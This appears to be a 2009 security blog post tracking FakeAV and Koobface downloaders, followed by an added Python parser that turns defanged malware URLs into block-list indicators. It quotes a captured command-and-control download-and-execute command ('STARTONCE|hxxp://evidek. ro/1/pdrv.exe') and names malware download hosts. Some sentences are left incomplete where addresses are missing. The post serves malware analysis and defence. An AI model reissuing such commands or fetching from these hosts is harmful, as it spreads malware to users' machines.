Softwarefortubeview Moves to a New Home at

We posted a couple of weeks ago on the continued success of a group in distributing FakeAv/Rogueware/Scareware.

Please note that their downloaders have been moved to a new home at There are multiple domains currently resolving to that IP, which is managed by “Sago Networks”. One we know of, currently serving softwarefortubeview.40019.exe executables, is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.

The downloads appear to be committing some sort of click fraud, although they have also been known to pop fake alerts to push FakeAv software (see here, here and here).

Update (2009.06.09) — we are following the downloaders, and the group moved to another couple of IPs yesterday (2009.06.08), this time and For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtual-hosts an array of content, including “Download Now!” links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/av-scanner.48047.exe. This dropper/downloader, however, lays out a couple of click-fraud trojans that visit a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed, and an unusually packed Koobface variant is dropped on the machine. Another component, an iehelper.dll BHO (Browser Helper Object), pops a screenful of AntiVirus System PRO, or SWP2009Pro, a dialog reading “There are serious threats detected on your computer”, and another bogus “Windows Security Alert” reporting “Windows reports that your computer is infected”.

The final, and fairly new, piece is that it downloads pdrv.exe from evidek.ro. The “download and exec” command for this executable is sent down over a Koobface-related channel while more bogus alerts are popping on the system:

The partially mangled Koobface post and response are listed here:

POST /ld/gen.php
Host: upr15may.com

STARTONCE|hxxp://evidek. ro/1/pdrv.exe
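The response above is a one-line command of the shape COMMAND|url, with the URL defanged (hxxp, a space after the dot) so it cannot be clicked. The following is an added example, not code from the original post or from the Koobface authors: it parses a captured response body of that shape, refangs the URLs into usable block-list indicators, and flags filenames that match the softwarefortubeview.NNNNN.exe / av-scanner.NNNNN.exe naming used by this group's droppers. The sample body is constructed: the first line is the one quoted above; the second reuses a URL named earlier in the post, and that it arrived over this channel is an assumption for the example only. Treating any line without a pipe as an unknown command is also an assumption, since the post shows only STARTONCE.

```python
"""Parse a Koobface-style COMMAND|url response and turn the defanged URLs
into block-list indicators.  Added example; not code from the original post."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample body: line 1 is the command quoted in the post; line 2 is
# built from a dropper URL the post names (assumed, for illustration, to have
# arrived on the same channel).  A blank line is included to show it is skipped.
SAMPLE_BODY = """STARTONCE|hxxp://evidek. ro/1/pdrv.exe

STARTONCE|hxxp://my-exe-profile. com/softwarefortubeview.45084.exe
"""

# Dropper filenames the post associates with this group: <name>.<digits>.exe
DROPPER_NAME_RE = re.compile(r"^(softwarefortubeview|av-scanner)\.\d+\.exe$", re.I)


@dataclass
class C2Command:
    verb: str
    raw_arg: str
    url: Optional[str]          # refanged URL, or None if the argument is not a URL
    host: Optional[str]
    filename: Optional[str]
    known_dropper_name: bool    # filename matches DROPPER_NAME_RE


def refang(indicator: str) -> str:
    """Undo the defanging used in the post (hxxp -> http, 'evidek. ro' -> 'evidek.ro')
    and the common '[.]' / '(.)' forms, so the result can go into a block list."""
    s = indicator.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)
    s = re.sub(r"\s*(\[\.\]|\(\.\)|\.)\s*", ".", s)
    return s


def parse_command(line: str) -> Optional[C2Command]:
    """Parse one response line.  Returns None for blank lines.  Lines without a
    pipe are kept as verb 'UNKNOWN' rather than dropped, so an analyst sees them."""
    line = line.strip()
    if not line:
        return None
    verb, sep, arg = line.partition("|")
    if not sep:
        return C2Command("UNKNOWN", line, None, None, None, False)
    url = refang(arg)
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return C2Command(verb.upper(), arg, None, None, None, False)
    filename = parts.path.rsplit("/", 1)[-1] or None
    known = bool(filename and DROPPER_NAME_RE.match(filename))
    return C2Command(verb.upper(), arg, url, parts.hostname, filename, known)


def parse_c2_response(body: str) -> List[C2Command]:
    cmds = []
    for line in body.splitlines():
        cmd = parse_command(line)
        if cmd is not None:
            cmds.append(cmd)
    return cmds


def download_hosts(cmds: List[C2Command]) -> List[str]:
    """Hosts that STARTONCE commands fetch from, de-duplicated, in order of appearance."""
    seen: List[str] = []
    for cmd in cmds:
        if cmd.verb == "STARTONCE" and cmd.host and cmd.host not in seen:
            seen.append(cmd.host)
    return seen


if __name__ == "__main__":
    commands = parse_c2_response(SAMPLE_BODY)
    for cmd in commands:
        print(cmd)
    print("block these hosts:", download_hosts(commands))
```

Feeding a body captured from the POST to /ld/gen.php through this gives the hosts to block at the proxy and the filenames to hunt for on endpoints; anything that comes back as UNKNOWN is a command shape the post did not document and deserves a manual look.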

This dropper creates
for which there is virtually no AV detection at this time. As always, don’t forget your behavior-based protection.

The podmena.sys driver is interesting — it attaches itself to the TCP/IP device driver (tcpip.sys) and appears to intercept network traffic coming into and going out of the system.
